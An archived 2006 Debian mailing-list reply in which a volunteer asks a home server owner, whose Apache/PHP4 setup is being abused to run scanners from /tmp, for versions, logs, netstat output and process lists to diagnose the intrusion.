Re: security issues with apache!

To: debian-user@lists.debian.org
Cc: debian-security@lists.debian.org
Subject: Re: security issues with apache!
From: "Josep Serrano" <mylists@montblanc.homeip.net>
Date: Tue, 7 Mar 2006 11:56:18 +0100 (CET)
Message-id: <[🔎] 22414.192.165.213.18.1141728978.squirrel@montblanc.homeip.net>
In-reply-to: <440D5F25.4090800@isecore.net>
References: <440D5F25.4090800@isecore.net>

Hello Petter

The actual list for security issues is debian-security. The address of this list its
on the CC. We can now leave debian-user and switch our discussion into
debian-security.

This is quite hole! Can't believe there's such a big spot in Apache / Sarge and we
didn't heard of it. Can you please share more details with us?

Give us your current package versions of apache (using dpkg -s for example). If you
suspect the installation could be compromised run a test on the checksums.

Your access logs could contain precious information. Have a look at them and post to
the list any significant parts (removing any ip/host address you don't want to get
published).

We still don't know for what do you use your apache. Most of the problems come from
poor PHP scripts. What scripts/services are you running in this server?

Can you post a sample of your netstat, your list of process for user www-data, and a
sample of the files you find in your /tmp ?


Regards,
Josep SERRANO


> Hi
>
> I'm not completely new to Debian or Linux, but I wouldn't classify
> myself as a battlescarred sysadmin just yet :)
>
> Anyways. My problem is security-related, and I hope that I'm posting to
> the correct list as well as hoping that someone can help me out here.
>
> Recently I've noticed that my Apache-installation gets violated and that
> an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> makes Apache execute these. Unfortunately these are some rather nasty
> things, mostly portscanners and bruteforce-attacks. They are all easily
> detected with netstat, and at least once a day I have to go in and kill
> the processes spawned by www-data (the user that runs Apache) as well as
> delete the offending files.
>
> Now, like I said - I'm not a pro, I'm trying to learn by doing.
> Unfortunately how this happens is way over my experience, and now I
> could really use some help in fixing this leak. I've narrowed it down to
> Apache only, but I have no clue as to how to seal the leak. I'm running
> a small server in my home using (mostly) Debian Sarge. This is a real
> Frankenstein-machine as it was originally a Woody-box, but it's been
> upgraded with bits from all over. It's been running pretty much
> constantly for three years. Of course I apply security fixes when they
> arrive, but I don't know if the source of these intrusions is Apache or
> just that I have managed to fubar some setting somewhere, allowing an
> attacker to make Apache execute code.
>
> Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> other services running on it, but I've noticed that the
> intrusions/code-executions only happen through Apache. MySQL only
> listens on localhost and accepts no connections from the outside. Hence,
> I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> PHP 4.3
>
> I deeply appreciate any help that can make me seal this leak! Thank you
> all in advance!
>
> /petter senften
>

Reply to:

Follow-Ups:
- Re: security issues with apache!
  - From: Ismail <ismailh@ifi.uio.no>
- Re: security issues with apache!
  - From: Stephen Gran <sgran@debian.org>

Prev by Date: legal diploma
Next by Date: Re: security issues with apache!
Previous by thread: legal diploma
Next by thread: Re: security issues with apache!
Index(es):
- Date
- Thread